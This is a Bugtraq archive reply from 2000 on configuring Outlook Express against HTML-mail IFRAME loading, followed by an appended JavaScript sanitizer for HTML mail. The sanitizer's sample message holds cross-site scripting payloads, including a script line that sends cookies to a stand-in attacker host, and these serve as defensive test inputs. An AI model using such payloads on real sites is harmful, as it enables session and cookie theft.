Bugtraq mailing list archives

Re: recent 'cross site scripting' CERT advisory


From: martin () FERBER-SOFTWARE DE (Manuel Martin)
Date: Tue, 8 Feb 2000 21:44:00 +0100


Hello all,

On Sat, 5 Feb 2000 10:52:11 -0700 Marc Slemko wrote:
> 2. Do not use a mail reader that forces you to display HTML messages.
> Using something like Outlook Express is very dangerous, since it
> means that you can be exploited if an email message arrives in your
> inbox and is displayed.  If you do use something like Outlook
> Express, be sure to configure it to disable scripting and make it
> as restrictive as possible.  Unfortunately, in the case of Outlook
> Express, this doesn't appear to be enough since I can't find any
> setting that will stop things like IFRAMEs from automatically
> loading, which are enough to make you vulnerable in many situations.
> Hopefully I'm missing something.

FYI (hopefully I am right): OE 5 can be configured to use one of two
zone settings for HTML mail (Internet or Restricted). The zone settings
can be configured to exclude loading files in an IFRAME. This is more
than many other mail clients which display HTML offer.

Bye, MM

--
Manuel Martin
mailto:manuel () martinnet de
http://www.martinnet.de
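The restriction both posters are reaching for (no script, no IFRAME auto-loading) can also be enforced by the mail reader or a mail gateway itself, by stripping active content before a message is rendered. Below is an added example of such a sanitizer, written here for illustration; it is not code from this thread, from Outlook Express, or from any mail client. The allowlists are choices made for the example, and the hostnames in the sample message are constructed.

```javascript
// Added example, not code from the original thread or from Outlook Express:
// an allowlist-based sanitizer of the kind an HTML-capable mail reader (or a
// mail gateway) can apply before a message is rendered. It removes active
// content such as SCRIPT and IFRAME, and attributes that execute script or
// auto-load remote resources, so that merely displaying a message cannot run
// code or make the reader's machine fetch attacker-chosen URLs.

// Inert formatting elements that are kept. IMG is deliberately absent: a remote
// image is an automatic fetch too, and the same beacon/tracking concern applies.
const ALLOWED_TAGS = new Set([
  "p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol", "li",
  "blockquote", "pre", "code", "div", "span", "table", "tr", "td", "th",
]);
// Elements whose tags and contents are both discarded.
const DROP_WITH_CONTENT = new Set([
  "script", "style", "iframe", "object", "embed", "applet", "noscript",
]);
// The only attributes kept; every on* handler, style, src, etc. is dropped.
const ALLOWED_ATTRS = new Set(["href", "title"]);
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Accept relative URLs and an allowlist of schemes. Control characters and
// whitespace are removed before the check, so "java\nscript:" cannot slip through.
function safeUrl(value) {
  const v = value.replace(/[\u0000-\u0020]/g, "").toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(v);
  return m === null || ALLOWED_SCHEMES.has(m[1]);
}

function escapeAttr(v) {
  return v.replace(/"/g, "&quot;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Rebuild the attribute list from scratch, keeping only allowlisted names.
function sanitizeAttrs(tag, attrText, dropped) {
  const attrRe = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let kept = "";
  let m;
  while ((m = attrRe.exec(attrText)) !== null) {
    const name = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? "";
    if (!ALLOWED_ATTRS.has(name)) continue;
    if (name === "href" && !safeUrl(value)) { dropped.push(`${tag}@href`); continue; }
    kept += ` ${name}="${escapeAttr(value)}"`;
  }
  return kept;
}

// Returns { html, dropped }: the sanitized markup and a list of what was removed
// (useful for logging at a gateway). Unknown elements lose their tags but keep
// their text; a "<" that does not start a tag is escaped.
function sanitizeHtmlMail(html) {
  const dropped = [];
  let out = "";
  let skipUntil = null; // inside a DROP_WITH_CONTENT element until this closing tag
  let i = 0;
  while (i < html.length) {
    const lt = html.indexOf("<", i);
    if (lt === -1) { if (!skipUntil) out += html.slice(i); break; }
    if (!skipUntil) out += html.slice(i, lt);
    if (html.startsWith("<!--", lt)) {           // comments are dropped
      const end = html.indexOf("-->", lt + 4);
      i = end === -1 ? html.length : end + 3;
      continue;
    }
    const gt = html.indexOf(">", lt);
    if (gt === -1) {                              // unterminated tag: escape the rest
      if (!skipUntil) out += html.slice(lt).replace(/</g, "&lt;");
      break;
    }
    const raw = html.slice(lt + 1, gt);
    const m = /^(\/?)\s*([a-zA-Z][a-zA-Z0-9]*)([\s\S]*)$/.exec(raw);
    if (m === null) {
      if (raw.startsWith("!") || raw.startsWith("?")) { i = gt + 1; continue; } // <!DOCTYPE>, <?xml>
      if (!skipUntil) out += "&lt;";
      i = lt + 1;
      continue;
    }
    const closing = m[1] === "/";
    const name = m[2].toLowerCase();
    i = gt + 1;
    if (skipUntil !== null) {
      if (closing && name === skipUntil) skipUntil = null;
      continue;
    }
    if (DROP_WITH_CONTENT.has(name)) {
      if (!closing) { skipUntil = name; dropped.push(name); }
      continue;
    }
    if (!ALLOWED_TAGS.has(name)) { if (!closing) dropped.push(name); continue; }
    out += closing ? `</${name}>` : `<${name}${sanitizeAttrs(name, m[3], dropped)}>`;
  }
  return { html: out, dropped };
}

// Constructed sample message (not a real mail): one harmless link plus the kinds
// of content an HTML mail can use to act on display alone.
const SAMPLE_MAIL = [
  '<p>Hi, see the <a href="http://www.example.com/report">report</a>.</p>',
  '<iframe src="http://vulnerable.example/search?q=%3Cscript%3Ealert(1)%3C/script%3E" width="0" height="0"></iframe>',
  '<img src="http://tracker.example/beacon.gif" onload="alert(document.cookie)">',
  '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
  '<a href="javascript:alert(1)">click</a>',
].join("\n");

const SAMPLE_RESULT = sanitizeHtmlMail(SAMPLE_MAIL);
console.log(SAMPLE_RESULT.html);
console.log("dropped:", SAMPLE_RESULT.dropped.join(", "));
```

Run it with node; it prints the sanitized sample, in which only the plain link survives and the IFRAME, the tracking image, the script and the javascript: link are gone. A tag-level allowlist is the reliable direction here: a denylist that blocks IFRAME alone still leaves OBJECT, EMBED and every on* handler, and anything a parser keeps "because it is unknown" will eventually be something active.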


